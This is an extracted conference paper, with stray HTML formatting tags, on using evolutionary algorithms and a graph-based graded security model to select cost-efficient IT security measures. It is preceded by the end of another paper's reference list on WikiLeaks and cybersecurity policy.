http://www.wash<strong>in</strong>gtontimes.com/news/2010/aug/6/pentagon-bars-staff-from-visit<strong>in</strong>g-wikileaks-site/<br />
Schmitt, E. (2010) 'In Disclos<strong>in</strong>g Secret Documents, WikiLeaks Seeks ‘Transparency’' The New York Times, July 25<br />
[Onl<strong>in</strong>e] Available: http://www.nytimes.com/2010/07/26/world/ 26wiki.html [30 Jan 2011]<br />
The Cybersecurity Act of 2009 (S 773 IS) (2009) Act. [Onl<strong>in</strong>e] Available: http://frwebgate.access.gpo.gov/cgib<strong>in</strong>/getdoc.cgi?dbname=111_cong_bills&docid=f:s773rs.txt.pdf<br />
[30 Jan 2011]<br />
US Department of Defense (2010) 'DOD News Brief<strong>in</strong>g with Secretary Gates and Adm. Mullen from the Pentagon'<br />
[Onl<strong>in</strong>e] Available: http://www.defense.gov/transcripts/transcript.aspx?transcriptid=4728 [30 Jan 2011]<br />
White House (2009) Cyberspace Policy Review: Assur<strong>in</strong>g a Trusted and Resilient Information and Comunications<br />
Infrastructure. [Onl<strong>in</strong>e] Available: http://www.whitehouse.gov/assets/documents/<br />
Cyberspace_Policy_Review_f<strong>in</strong>al.pdf [30 Jan 2011]<br />
Wikirebels (2010) Documentary, Swedish Television. [Onl<strong>in</strong>e] Available: http://www.viddler.com/<br />
explore/WikiRebels/videos/1/ [30 Jan 2011]<br />
Yould, R. (2003) 'Beyond the American Fortress: Understand<strong>in</strong>g Homeland <strong>Security</strong> <strong>in</strong> the Information Age'. In<br />
Latham, R. (Ed.) Bombs and Bandwidth: The emerg<strong>in</strong>g relationship between <strong>in</strong>formation technology and<br />
security, New York, The New Press.<br />
171
Evolutionary Algorithms for Optimal Selection of <strong>Security</strong><br />
Measures<br />
Jüri Kivimaa 1 and Toomas Kirt 2<br />
1<br />
Cooperative Cyber Defence Centre of Excellence, Tall<strong>in</strong>n, Estonia<br />
2<br />
University of Tartu, Tall<strong>in</strong>n, Estonia,<br />
Jyri.Kivimaa@mil.ee<br />
Toomas.Kirt@ut.ee<br />
Abstract: A very important issue <strong>in</strong> IT <strong>Security</strong> or Cyber <strong>Security</strong> management is to provide cost-efficient security<br />
measures to achieve needed or required security goals (ma<strong>in</strong>ly CIA - Confidentiality, Integrity, Availability levels). For<br />
provid<strong>in</strong>g an optimal solution an optimization task with two goals have to be solved – to m<strong>in</strong>imize needed resources<br />
and to maximize achievable security. The computational complexity of the optimization task is very high. In previous<br />
work a matrix based security model and an optimization framework based on the Pareto optimality and the discrete<br />
dynamic programm<strong>in</strong>g method has been used. But that solution has a quite important imperfection – there was<br />
required <strong>in</strong>dependence between security activity areas. That is not appropriate for IT security, as this solution does<br />
not follow the quite important pr<strong>in</strong>ciple <strong>in</strong> IT security – security is like a cha<strong>in</strong> that is only as strong as the weakest l<strong>in</strong>k<br />
of layered security or defence <strong>in</strong> depth. The evolutionary optimization, as an alternative optimization tool, removed<br />
the <strong>in</strong>dependence restriction of the matrix based security model and the dynamic optimization method, but the first<br />
implementation of it was slightly slower than the other methods. For improv<strong>in</strong>g the performance of the evolutionary<br />
optimization we have performed a meta-level optimization of parameters of the algorithm and as a result the speed of<br />
optimization is comparable to other optimization techniques. As the evolutionary optimization is <strong>in</strong>dependent for all<br />
possible budget levels it lead to possibility to use a graph based security model. The graph based security model is a<br />
new and dynamical framework for security management. This paper presents how implementation of an evolutionary<br />
optimization technique removed the restrictions of <strong>in</strong>dependence of security measures and lead to implementation of<br />
an efficient graph based security model.<br />
Keywords: graded security model, <strong>in</strong>formation security metrics, evolutionary optimization<br />
1. Introduction<br />
One of the most important tasks for IT security management is the optimal use of exist<strong>in</strong>g resources and<br />
the ma<strong>in</strong> idea for our R&D work is to propose to IT <strong>Security</strong> decision-makers a Graded <strong>Security</strong> Model<br />
(GSM) and a decision support system for this. In papers (Kivimaa, 2009; Kivimaa, Ojamaa, and Tyugu,<br />
2009; Ojamaa, Tyugu, and Kivimaa, 2008) it was shown how to use the GSM for f<strong>in</strong>d<strong>in</strong>g optimal solutions<br />
based on the Pareto-optimal situation analysis, the discrete dynamic programm<strong>in</strong>g method for<br />
optimization calculations and weighted average confidence of security activities areas was used as<br />
optimization criteria. As it turned out the computational complexity of the optimization task is very high.<br />
For example, if to consider that an IT security model has 30-40 activity areas and <strong>in</strong> each of them has 4<br />
possible implementation levels then there are 4 30 ÷ 4 40 possible solutions with<strong>in</strong> to select an optimum.<br />
The Brute Force optimization technique requires a couple of years to calculate even one possible budget<br />
po<strong>in</strong>t.<br />
In (Kivimaa 2009) was also brought up some weaknesses caused from the dynamic programm<strong>in</strong>g<br />
method. Namely, us<strong>in</strong>g dynamic programm<strong>in</strong>g <strong>in</strong> optimization of security activities areas must not be<br />
dependent from each other and their levels must be additive. To achieve better solutions <strong>in</strong> the future it is<br />
reasonable to cont<strong>in</strong>ue GSM development – ma<strong>in</strong>ly to collect expert knowledge for the up-to-date model<br />
– that is, up-to-date <strong>in</strong>formation about security goals, their levels and <strong>in</strong>formation security activities areas<br />
and their realization levels dependency matrix and up-to-date theirs levels realization costs and<br />
effectiveness’s. And, as <strong>in</strong>dependent IT security activities is source for quite serious problems, to cover IT<br />
security problems <strong>in</strong> more detail and correct way we have to accept dependencies between l<strong>in</strong>es <strong>in</strong><br />
Dependencies Matrix - to describe these dependencies <strong>in</strong> addition to Dependencies Matrix use (f<strong>in</strong>d or<br />
work out) the IT security or IT security activities areas Dependencies Graph.<br />
Because the <strong>in</strong>dependence of security activity areas was required by the Dynamic Programm<strong>in</strong>g (DP)<br />
method our aim was to apply an alternative method for optimization and we decided to use an<br />
evolutionary algorithm as a universal method for complex optimization <strong>in</strong> many fields. The evolutionary<br />
algorithm starts each optimization process from the beg<strong>in</strong>n<strong>in</strong>g and therefore it does not have any<br />
problems related to <strong>in</strong>dependence and additivity.<br />
172
Jüri Kivimaa and Toomas Kirt<br />
As the evolutionary optimization is <strong>in</strong>dependent for all possible or <strong>in</strong>terest<strong>in</strong>g budget levels and <strong>in</strong>tervals it<br />
leads to possibility to use a graph based security model. The graph based security model is a new and<br />
dynamical framework for security management. The new graph model gives us possibility to calculate the<br />
most needed/wanted reliability for a specific IT security System (also often named as Confidence) and<br />
<strong>Security</strong> Efficiency (SE), which value can be expressed as SE = Information Value / Real Losses = 1 / (1-<br />
Confidence).<br />
Our ma<strong>in</strong> ideas are:<br />
Use metrics to determ<strong>in</strong>e <strong>in</strong>formation systems security requirements - i.e. use high level risk analysis<br />
(levels of security goals) as IT security metrics;<br />
Secure IT systems and their <strong>in</strong>formation <strong>in</strong> an economically rational/optimal manner – i.e. accord<strong>in</strong>gly<br />
to data security requirements;<br />
The important issue <strong>in</strong> def<strong>in</strong><strong>in</strong>g and implement<strong>in</strong>g security measures is the economic efficiency of<br />
security activities, that is: we want to get the best results for our money - to m<strong>in</strong>imize the costs and to<br />
maximize the <strong>in</strong>tegral security confidence.<br />
2. Graded security model<br />
The graded security model has been <strong>in</strong> use for a long time <strong>in</strong> the high-risk areas like nuclear waste<br />
depositories, radiation control etc. (DOE 1999, see also Kivimaa 2009 for details). In IT security is also<br />
reasonable to apply a methodology that allows one to select rational security measures based on graded<br />
security, and tak<strong>in</strong>g <strong>in</strong>to account the available resources, <strong>in</strong>stead of us<strong>in</strong>g only hard security constra<strong>in</strong>ts<br />
prescribed by standards that usually do not <strong>in</strong>clude economic parameters - the cost and efficiency of<br />
implemented security measures.<br />
The ideas of graded security were used on the US Department of Energy security model (DOE 1999) and<br />
on its updated NISPOM version (NISPOM 2006).<br />
In the NISPOM model 14 graded security activities areas are def<strong>in</strong>ed and 15÷20 left only on base levels.<br />
As the NISPOM model is meant for protection of critical <strong>in</strong>formation <strong>in</strong>frastructure it is obvious that these<br />
base levels are the highest possible implementation levels. But for <strong>in</strong>stitutions hav<strong>in</strong>g less critical IT<br />
security these NISPOM areas on the base level have different possible implementation levels too – i.e.<br />
theoretically they are graded too (look Figure 1).<br />
But the matrix based model has one quite serious limitation – <strong>in</strong> table we have no good possibilities to<br />
consider dependencies between table columns and rows – that is, there is not any good way to describe<br />
really exist<strong>in</strong>g additive and dependent nature <strong>in</strong> IT security goals and activities areas (Kivimaa 2009).<br />
2.1 Graph based security model<br />
It is possible to write dependencies between the matrix rows as functions <strong>in</strong>to cells, but much more<br />
understandable and comprehensive results (understandable <strong>in</strong> one look) if we represent collection of<br />
rules as a graph structure. At the same we are no more limited to weighted average only, with graph we<br />
get possibility to calculate for decision makers some very <strong>in</strong>terest<strong>in</strong>g and important parameters about<br />
achieved security level - confidence and security efficiency (<strong>in</strong> more details look 2.2).<br />
The graded IT security graph is based on the ma<strong>in</strong> ideas from the “(People - Process – Technology) and<br />
Organization” Bus<strong>in</strong>ess Model for IT security (ISACA 2009). Based on this and the IT security<br />
Dependency Matrix (Figure 1), conta<strong>in</strong><strong>in</strong>g security areas and their levels, a Bank IT security Graph<br />
(Figure 2) is formed.<br />
There are two important pr<strong>in</strong>ciples <strong>in</strong> IT security that are based on the graph and are much more visible<br />
and understandable:<br />
A cha<strong>in</strong> is only as strong as the weakest l<strong>in</strong>k – <strong>in</strong> some IT security areas we must have valid reliability<br />
level otherwise overall reliability of security system will be 0 (look Figure 2 – ma<strong>in</strong>ly people, SW,<br />
Power, HW, LAN and AntiMalware) - so called must-be elements <strong>in</strong> the graph (look Figure 2).<br />
173
Jüri Kivimaa and Toomas Kirt<br />
Layered security / defence <strong>in</strong> depth – we have a lot security activities areas that are parallel to so<br />
called must-be areas that make possible to raise reliability of these must-be areas (Figure 2).<br />
Figure 1: IT security dependency matrix for a bank<br />
174
Figure 2: IT security dependency graph for a bank<br />
Jüri Kivimaa and Toomas Kirt<br />
175
2.2 Model optimization<br />
Jüri Kivimaa and Toomas Kirt<br />
We are build<strong>in</strong>g a model that b<strong>in</strong>ds security measures (grouped by security activities areas) with costs<br />
and confidences of achieved the security goals and their levels. We <strong>in</strong>troduce a fitness function that<br />
presents by one numeric value the <strong>in</strong>tegral confidence of achieved security level. This allows us to<br />
formulate a problem of select<strong>in</strong>g security measures as an optimization problem <strong>in</strong> precise terms.<br />
However, we still have two goals: to m<strong>in</strong>imize the costs and to maximize the <strong>in</strong>tegral security confidence.<br />
This problem will be solved by means of build<strong>in</strong>g a Pareto optimality trade-off curve that explicitly shows<br />
the relation between used resources and security confidence (Figure 3).<br />
Know<strong>in</strong>g the available resources, we can f<strong>in</strong>d the best possible security level that can be achieved with<br />
the available resources and f<strong>in</strong>d the security measures to be taken. From the other side – if the required<br />
security level is given we can f<strong>in</strong>d the resources needed and the measures that have to be taken. This<br />
requires solv<strong>in</strong>g an optimization problem for each value of resources.<br />
Figure 3: Search of optimal security along resource dimension – Pareto optimality trade-off curve<br />
To calculate Pareto set/curve for GSM we have used/tested three possible optimization techniques:<br />
Brute Force<br />
Dynamic Programm<strong>in</strong>g<br />
Evolutionary Algorithms<br />
And all approaches have their pluses and m<strong>in</strong>uses. The first area for problems is calculations time<br />
needed for optimization (<strong>in</strong> more detail look 2.2.1).<br />
Although the Dynamic Programm<strong>in</strong>g method is very good way to become free from calculation time<br />
problems (optimizations time for medium consumer desktop PC is excellent – m<strong>in</strong>ute or two), the DP has<br />
quite serious other limitations:<br />
<strong>Security</strong> activities areas/security measures groups must be not dependent from each other<br />
Their levels/security measures to realize their levels must be additive<br />
Practically impossible to specify alternative and very close optimization results.<br />
The best capabilities has the evolutionary algorithm – it has no problems with dependency/<strong>in</strong>dependency,<br />
additive/non-additive and matrix/graph, it f<strong>in</strong>ds all alternative or very close results for all possible and<br />
176
Jüri Kivimaa and Toomas Kirt<br />
<strong>in</strong>terest<strong>in</strong>g cost-levels and the ma<strong>in</strong> advantage is that evolutionary optimization starts optimization for all<br />
possible and/or <strong>in</strong>terest<strong>in</strong>g budget po<strong>in</strong>ts from the very beg<strong>in</strong>n<strong>in</strong>g. The only possible problem is related to<br />
calculations time - the parameters for optimization have to be optimal (<strong>in</strong> more detail look 2.2.1 and 3.1).<br />
2.2.1 The computational complexity of the optimization task<br />
For compar<strong>in</strong>g three optimization methods we will f<strong>in</strong>d calculation times for all three optimization methods<br />
for small and medium not IT-critical enterprises (~10 security activities areas) and for bigger IT-critical<br />
enterprises (for the Bank ~30 security activities areas):<br />
3. Brute force<br />
We have to calculate and compare qk n possible variations (q is the number of possible values of security<br />
budget levels, n is the number of security measure groups or security activities areas, k is the value of<br />
possible implementation levels for security measure group/security activities area, quite prevalently used<br />
3 or 4):<br />
For 10 security activities areas is required test<strong>in</strong>g of 100*4 10 =~100*10 6 variations,<br />
For 30 security activities areas is required test<strong>in</strong>g of 100*4 30 =~100*10 18 variations,<br />
In more detailed IT security handl<strong>in</strong>g (n) optimization time <strong>in</strong>crease is exponential and if to consider that<br />
medium consumer PC can perform optimization for 10 security activities areas (for small and not ITcritical<br />
<strong>in</strong>stitution, ~100*10 6 calculations and comparisons) <strong>in</strong> a m<strong>in</strong>ute then Brute Force optimization for<br />
bigger and IT-critical <strong>in</strong>stitution will take hundreds years.<br />
4. Dynamic programm<strong>in</strong>g<br />
We have to calculate and compare q 2 kn possible variants (q is the number of possible values of security<br />
budget levels, n is the number of security measure groups or security activities areas, k is the value of<br />
possible implementation levels for security measure group/security activities area, quite prevalently used<br />
3 or 4):<br />
For 10 security activities areas is required test<strong>in</strong>g of 100*100*4*10=0,4*10 6 variations,<br />
For 30 security activities areas is required test<strong>in</strong>g of 100*100*4*30=1.2*10 6 variations.<br />
In more detailed IT security handl<strong>in</strong>g optimization time <strong>in</strong>crease is l<strong>in</strong>ear and consequenly n rise even the<br />
magnitude does not lead to any calculations time problems.<br />
5. Evolutional<br />
The number of variants required to calculate/compare by this algorithm is:<br />
q * Population size * Number of Generations * Number of Repeats.<br />
And as based on results of meta-level optimization (see 3.1.2) ‘Population size’ = n*3, ‘Number of<br />
Generations’ = n*4 and ‘Number of Repeats’ = 3 (q is the number of possible values of security budget<br />
levels, n is the number of security measure groups or security activities areas) and optimal number of<br />
variants to calculate and compare is 36*q*n 2 :<br />
For 10 security activities areas is required test<strong>in</strong>g of 36*100*10 2 =0,36*10 6 variations,<br />
For 30 security activities areas is required test<strong>in</strong>g of 36*100*40 2 =3.24*10 6 variations.<br />
For more detailed IT security handl<strong>in</strong>g optimization time <strong>in</strong>crease is quadratic and consequently is quite<br />
important to use optimal parameters <strong>in</strong> optimization.<br />
In conclusion:<br />
Optimization time is critical,<br />
The Brute Force optimization method is <strong>in</strong>appropriate for more complex cases,<br />
The Dynamic Programm<strong>in</strong>g based optimization method has not any problems related to calculations<br />
time,<br />
For the Evolutionary method it is important to use the optimal optimization parameters.<br />
177
Jüri Kivimaa and Toomas Kirt<br />
5.1.1 GS graph-based model reliability/confidence calculations<br />
The ma<strong>in</strong> idea for optimization is to achieve graph’s maximal Confidence with m<strong>in</strong>imal Costs – i.e. Pareto<br />
set or Pareto frontier for GSM Costs or Confidence.<br />
5.1.2 Reliability (alias confidence) of series systems of "n" identical and <strong>in</strong>dependent components<br />
A series system is a configuration such that, if any one of the system components fails, the entire system<br />
fails. Conceptually, a series system is one that is as weak as its weakest l<strong>in</strong>k. A graphical description of a<br />
series system is shown <strong>in</strong> Figure 4.<br />
Figure 4: Representation of a series system of "n" components<br />
Eng<strong>in</strong>eers are tra<strong>in</strong>ed to work with system reliability [RS] concepts us<strong>in</strong>g "blocks" for each system<br />
element, each block hav<strong>in</strong>g its own reliability for a given mission time T:<br />
RS = R1 × R2 × ... Rn (if the component reliabilities differ, or)<br />
RS = [Ri ] n (if all i = 1, ... , n components are identical)<br />
A set of n blocks connected <strong>in</strong> series can be replaced with a s<strong>in</strong>gle block with the Reliability/Confidence<br />
RS/CS.<br />
5.1.3 Reliability (alias confidence) of parallel systems<br />
A parallel system is a configuration such that, as long as not all of the system components fail, the entire<br />
system works. Conceptually, <strong>in</strong> a parallel configuration the total system reliability is higher than the<br />
reliability of any s<strong>in</strong>gle system component. A graphical description of a parallel system of "n" components<br />
is shown <strong>in</strong> Figure 5.<br />
Figure 5: Representation of a parallel system of "n" components<br />
Reliability eng<strong>in</strong>eers are tra<strong>in</strong>ed to work with parallel systems us<strong>in</strong>g block concepts:<br />
RS = 1 - (1 - Ri ) = 1- (1 - R1) × (1 - R2) ×... (1 - Rn); if the component reliabilities differ, or<br />
RS = 1 - [1 - R] n ; if all "n" components are identical: [Ri = R; i = 1, ..., n].<br />
A set of n blocks connected <strong>in</strong> parallel can be replaced with a s<strong>in</strong>gle block with the reliability/Confidence<br />
RS/CS.<br />
By recursively replac<strong>in</strong>g the series and parallel subsystems by s<strong>in</strong>gle equivalent elements we can obta<strong>in</strong><br />
the Reliability/Confidence RS/CS for entire graph/system.<br />
178
Jüri Kivimaa and Toomas Kirt<br />
5.1.4 Specifics for GS graph-based model confidence calculations.<br />
In GSM we have the only so called must-be serial box’s and logic „if any one of the system components<br />
fails, the entire system fails“ is exact and perfect.<br />
But with parallel components is situation a bit more complicated. For full redundant security activities (for<br />
example, HW and Redundant HW) is pr<strong>in</strong>ciple „as long as not all of the system components fail, the<br />
entire system works exact, but if we have <strong>in</strong> parallel must-be security activity area with activities areas<br />
try<strong>in</strong>g to improve the must-be activity Confidence (as example HW and Logg<strong>in</strong>g/Monitor<strong>in</strong>g) then we have<br />
not fully redundant situation – we must br<strong>in</strong>g <strong>in</strong> Redundancy Coefficient RC.<br />
Practically RC = 1 ÷ 0,1 - for full redundancy RC = 1 and parallel to must-be activity with less Redundancy<br />
than 0,1 is po<strong>in</strong>tless.<br />
If for full redundancy C = 1 - (1 -C1_mb)*(1 - C2) = C1_mb + C2 ( 1 - C1_mb )<br />
then br<strong>in</strong>g<strong>in</strong>g <strong>in</strong> Redundancy Coefficient RC for Not-Full-Redundant parallel situations<br />
C = 1 - (1 -C1_mb)*(1 - RC* C2) or C = C1_mb + RC* C2*( 1 - C1_mb )<br />
By recursively replac<strong>in</strong>g the series (must-be) and parallel subsystems by s<strong>in</strong>gle equivalent elements we<br />
can obta<strong>in</strong> the Reliability/Confidence RS/CS for entire graph/system and the new graph model gives us<br />
possibility to calculate for IT managers/decision makers the most needed/wanted reliability for a specific<br />
IT security System (also often named as Confidence) and <strong>Security</strong> Efficiency (SE), which value can be<br />
expressed as<br />
SE = IT-risks / Real Losses = 1 / (1- CS).<br />
For example, on Figure 6 SE is produced as a function from IT security activities and measures of costs.<br />
Figure 6: SE = f (costs)<br />
6. Evolutionary algorithms<br />
Evolutionary algorithms are based on a Darw<strong>in</strong>ian natural selection process and form a class of<br />
population-based stochastic search algorithms (Dracopoulos, 2008; Eiben & Smith, 2003; Holland, 1975).<br />
The view, that random variation provides the mechanism for discover<strong>in</strong>g new solutions (Michalewicz &<br />
179
Jüri Kivimaa and Toomas Kirt<br />
Fogel, 2004), was <strong>in</strong>spired by the process of natural evolution. The idea of us<strong>in</strong>g Darw<strong>in</strong>ian pr<strong>in</strong>ciples of<br />
evolution to solve some comb<strong>in</strong>atorial optimization problems arose with the <strong>in</strong>vention of electronic<br />
computers. Now there are a wide variety of approaches that can be described as belong<strong>in</strong>g to the field of<br />
evolutionary comput<strong>in</strong>g. The algorithms used <strong>in</strong> the field are termed as evolutionary algorithms<br />
(Dracopoulos, 2008).<br />
The most important characteristics of evolutionary algorithms are as follows:<br />
Each candidate solution to the optimization problem is represented as an <strong>in</strong>dividual. The set of<br />
<strong>in</strong>dividuals are named as a population.<br />
The quality of a candidate solution is measured by a fitness function. Fitter solutions have a higher<br />
probability to survive and to contribute their characteristics to offspr<strong>in</strong>g (next generation).<br />
Variation operators (e.g., crossover, mutations) are applied to the <strong>in</strong>dividuals that modify the<br />
population of solutions dynamically.<br />
The average fitness is improved over time as a selection mechanism is applied and the fittest<br />
<strong>in</strong>dividuals are selected for the next generation (survival of the fittest).<br />
The basis of an evolutionary algorithm is simple. First, a population of <strong>in</strong>itial candidate solutions has to be<br />
generated randomly. Thereafter iteratively a number of variation generation operators are applied and for<br />
the new generations the fittest <strong>in</strong>dividuals are selected.<br />
6.1 Meta-level optimization of evolutionary algorithms<br />
The aim of this work is to optimize the parameters of an evolutionary algorithm. As the optimization<br />
process is based on randomness it makes the speed of the problem solv<strong>in</strong>g task rather variable. There<br />
are no hard and fast rules for choos<strong>in</strong>g appropriate values for the parameters (Cicirello & Smith, 2000).<br />
The first scientist, who put a considerable effort <strong>in</strong>to f<strong>in</strong>d<strong>in</strong>g parameter values, was De Jong (1975). He<br />
tested different values experimentally and concluded that the follow<strong>in</strong>g parameters give reasonable<br />
performance for his test functions: population size 50, crossover 0.6 and mutation rate 0.001 (see also for<br />
details Eiben, H<strong>in</strong>terd<strong>in</strong>g, & Michalewicz, 1999). But those values are suitable for the problem that he had<br />
at hand. It has been shown that it is not possible to f<strong>in</strong>d parameter values which are optimal for all<br />
problem doma<strong>in</strong>s (Wolpert, & Macready, 1997) therefore each problem need its own approach and<br />
different set of parameters.<br />
A widely practised approach to identify a good set of parameters for a particular class of problem is<br />
through experimentations and us<strong>in</strong>g the trial-and-error approach. As the evolutionary approach is mostly<br />
based on the trial-and-error to move through the search space therefore it would be reasonable to use<br />
the evolutionary algorithm itself to optimize its parameters and such approach is called as a meta-level<br />
optimization (Cicirello & Smith, 2000). The ma<strong>in</strong> weakness of this approach is that it is computationally<br />
expensive and takes a lot of time.<br />
There are two ways to improve the performance of the evolutionary algorithm. The strategy can either be<br />
static or adaptive (A<strong>in</strong>e, Kumar, & Chakrabarti, 2006). For static framework, the parameter values are<br />
decided at the start of the algorithm and the decision is not revised dur<strong>in</strong>g runtime. The static model<br />
works well when there is little or no uncerta<strong>in</strong>ty about the progress of the algorithm. For algorithms where<br />
the progress is not predictable and different parameter sett<strong>in</strong>gs are suitable at different stages, a dynamic<br />
monitor<strong>in</strong>g based strategy is preferred. In the dynamic case, the control decision is updated dur<strong>in</strong>g<br />
runtime by monitor<strong>in</strong>g the progress of the algorithm for a particular run. As the IT security costs<br />
optimization task is rather stable and does not <strong>in</strong>clude many uncerta<strong>in</strong>ties, we decided to f<strong>in</strong>d out a static<br />
set of parameters rather than develop a dynamic framework for parameter changes.<br />
6.1.1 Meta-level optimization set-up<br />
An <strong>in</strong>dividual <strong>in</strong> the optimization task was represented as a vector consist<strong>in</strong>g of 10 elements. The<br />
elements represented the adjustable set of parameters: Repeat – how many times to repeat optimization<br />
process, Population – population size, Tournament – tournament size (number of <strong>in</strong>dividuals <strong>in</strong> a subset),<br />
Generations – a predef<strong>in</strong>ed number of generations, Crossover – probability of apply<strong>in</strong>g crossover<br />
operator (value 0.49 means that <strong>in</strong> 49% cases the crossover occurs), Mutate – probability of mutation,<br />
Swap – probability of swapp<strong>in</strong>g, Inversion – probability of <strong>in</strong>version, Insertion – probability of <strong>in</strong>sertion,<br />
180
Jüri Kivimaa and Toomas Kirt<br />
and Displacement – probability of displacement. Dur<strong>in</strong>g the meta-level optimization process a candidate<br />
solution was optimized based on these parameters.<br />
An important question was how to measure the fitness of the meta-level evolutionary optimization. We<br />
had two optimization goals, first, to f<strong>in</strong>d maximum level of confidence and second, to f<strong>in</strong>d it as fast as<br />
possible. Therefore we had to comb<strong>in</strong>e the measure of confidence and time. As each optimization was<br />
repeated r times the value of meta-level fitness function F was calculated as average of fitness of orig<strong>in</strong>al<br />
task m<strong>in</strong>us time:<br />
F = sum(ci – ti) / r<br />
where ci is the confidence level and ti is the calculation time <strong>in</strong> seconds of i-th experiment (see curve <strong>in</strong><br />
Figure 7).<br />
6.1.2 Results of meta-level optimization<br />
We performed experiments with the data (Figure 1) consist<strong>in</strong>g of 33 security activity areas. From the<br />
orig<strong>in</strong>al data we formed 6 sets consist<strong>in</strong>g of 13, 17, 21, 25, 29 and 33 areas. The parameters for metalevel<br />
optimizer were as follows: population size 75, tournament size 15 and the number of generations<br />
75, crossover rate 0.9 and mutation rate 0.7.<br />
The optimization process took almost two and half days. As we could see on the detailed graph (Figure<br />
7) the f<strong>in</strong>e tun<strong>in</strong>g of the meta-level optimization took some time to f<strong>in</strong>d the optimal level.<br />
Figure 7: The fitness value of the meta-level optimization task (upper part of the fitness curve)<br />
Average results of the optimization process are given <strong>in</strong> Table 1.<br />
Table 1: Average values of parameters as a result of meta-level optimization<br />
No Pop Tournament Generations Crossover Mutation Swap Inversion Insertion Displacement<br />
13 28.86 41.43 42.86 0.82 0.7 0.58 0.19 0.15 0.15<br />
17 35.57 69.14 67.43 0.85 0.89 0.63 0.14 0.16 0.12<br />
21 46.57 40.71 70.71 0.8 0.88 0.53 0.1 0.13 0.12<br />
25 43.43 31.86 95.86 0.85 0.77 0.61 0.08 0.13 0.15<br />
29 48.86 65.29 92.43 0.8 0.89 0.74 0.07 0.1 0.16<br />
33 61.43 37.71 96.43 0.91 0.74 0.72 0.13 0.06 0.13<br />
181
Jüri Kivimaa and Toomas Kirt<br />
As we calculated correlation coefficients (Table 2) we could see that there is strong l<strong>in</strong>ear correlation<br />
between the number of security activity areas (the size of task) and the number of <strong>in</strong>dividuals <strong>in</strong> a<br />
population (r=0,95) and the number of generations (r=0.92). There is also positive correlation between<br />
the size of task and crossover probability (0.45). With the most other probability values the correlation is<br />
negative.<br />
Table 2: Correlation coefficients of all 35 selected results<br />
No Pop. Tourn. Gen. Crossover Mutate Swap Inversion Insertion Displace.<br />
No 1 0.95 -0.13 0.92 0.45 0.06 0.73 -0.64 -0.92 0.16<br />
Population 0.95 1 -0.21 0.82 0.48 0.08 0.57 -0.53 -0.93 -0.12<br />
Tournament -0.13 -0.21 1 -0.1 -0.29 0.7 0.37 -0.06 0.24 -0.04<br />
Generations 0.92 0.82 -0.1 1 0.4 0.18 0.62 -0.8 -0.71 0.16<br />
Crossover 0.45 0.48 -0.29 0.4 1 -0.47 0.4 0.2 -0.51 -0.28<br />
Mutate 0.06 0.08 0.7 0.18 -0.47 1 0.05 -0.56 0.18 -0.3<br />
Swap 0.73 0.57 0.37 0.62 0.4 0.05 1 -0.29 -0.7 0.38<br />
Inversion -0.64 -0.53 -0.06 -0.8 0.2 -0.56 -0.29 1 0.33 -0.21<br />
Insertion -0.92 -0.93 0.24 -0.71 -0.51 0.18 -0.7 0.33 1 -0.12<br />
Displacement 0.16 -0.12 -0.04 0.16 -0.28 -0.3 0.38 -0.21 -0.12 1<br />
In Figure 8 we could see that the probabilistic values of variation operators (Crossover, Mutation and<br />
Swap) had quite high values and the others value was rather small and even dim<strong>in</strong>ished as the problem<br />
grows. Probably their computational cost was relatively high compar<strong>in</strong>g the ga<strong>in</strong> of fitness.<br />
Figure 8: Change of probability of variation operators<br />
In Figure 9 we could see that there is a clear l<strong>in</strong>ear relation between the problem size and the population<br />
size and the number of generations.<br />
182
Jüri Kivimaa and Toomas Kirt<br />
Figure 9: Distribution of population and generation values and their mean value (l<strong>in</strong>e)<br />
Based on the measurements we were able to generate formulas to specify the parameters of<br />
evolutionary optimizer. As we added to the mean value and the standard deviation μ + σ to get rough<br />
estimate for the population related values (e.g., based on the mean value of Generations / Number<br />
security activity areas μ = 3.429, standard deviation σ = 0.5688, we can calculate the coefficient 3.429 +<br />
0.5688 ≈ 4). The results could be as follows:<br />
repeat 3<br />
population size N * 3<br />
tournament size 50<br />
generations N * 4<br />
where N is the number of security activity areas as the number of security levels is 4.<br />
As there was a tendency to move closer to certa<strong>in</strong> values we decided to use <strong>in</strong> further optimizations the<br />
follow<strong>in</strong>g parameter set for variation operators:<br />
crossover rate 0.9<br />
mutation rate 0.8<br />
swap rate 0.6<br />
<strong>in</strong>version rate 0.1<br />
<strong>in</strong>sertion rate 0.07<br />
displacement rate 0.11<br />
As we could predict optimal population related parameters and also identified optimal values for<br />
probability operator values we could estimate optimization time and to perform optimization tasks much<br />
faster.<br />
7. Conclusions<br />
We have performed an analysis to identify l<strong>in</strong>ear coefficients for estimat<strong>in</strong>g the parameter values of the<br />
evolutionary algorithm. As a result we have found a way to calculate the value for population size and the<br />
number generations that are based on the problem size and also identified optimal parameter set for<br />
variation operators. It makes the use of evolutionary algorithm more efficient and enables us to <strong>in</strong>crease<br />
the optimization speed. As there are certa<strong>in</strong> restrictions related to the other optimization techniques the<br />
183
Jüri Kivimaa and Toomas Kirt<br />
evolutionary approach also enables us to enhance the IT security methodology and a new graph-based<br />
model is proposed.<br />
But wider application of the graph-based model will depend on the availability of expert knowledge or<br />
statistics that b<strong>in</strong>ds costs and security confidence values with the security measures. This expert data will<br />
depend on the type of the <strong>in</strong>frastructure where <strong>in</strong>formation must be protected - different for different<br />
countries and economy areas. The only realistic solution is an expert system that can be adjusted by<br />
experts to suit concrete situations. Therefore some further work is needed to enhance the model and<br />
provide appropriate expert knowledge to turn the model more accurate.<br />
References<br />
A<strong>in</strong>e, S., Kumar, R., and Chakrabarti, P.P. (2006) “Adaptive Parameter Control of Evolutionary Algorithms Under<br />
Time Constra<strong>in</strong>ts”, <strong>in</strong> A., Tiwari, J. Knowles, E. Av<strong>in</strong>eri, K., Dahal, and R., Roy (Eds.), Applications of Soft<br />
Comput<strong>in</strong>g, Berl<strong>in</strong>, Spr<strong>in</strong>ger, pp. 373–382.<br />
Cicirello, V. A., and Smith, S. F. (2000) “Model<strong>in</strong>g GA performance for control parameter optimization”, <strong>in</strong> D., Whitley,<br />
D., Goldberg, E., Cant-Paz, L., Spector, I., Parmee, and H., Beyer (Eds.), GECCO-2000: Proceed<strong>in</strong>gs of the<br />
Genetic and Evolutionary Computation Conference, Las Vegas, NV, pp. 235–242.<br />
De Jong, K. (1975) “The analysis of the behavior of a class of genetic adaptive systems”, Ph.D. dissertation,<br />
Department Computer Science, University of Michigan, Ann Arbor, MI.<br />
DOE (1999) Classified Information Systems <strong>Security</strong> Manual. Retrieved February 1, 2010, from<br />
https://www.directives.doe.gov/directives/archive-directives/471.2-DManual-2/at_download/file.<br />
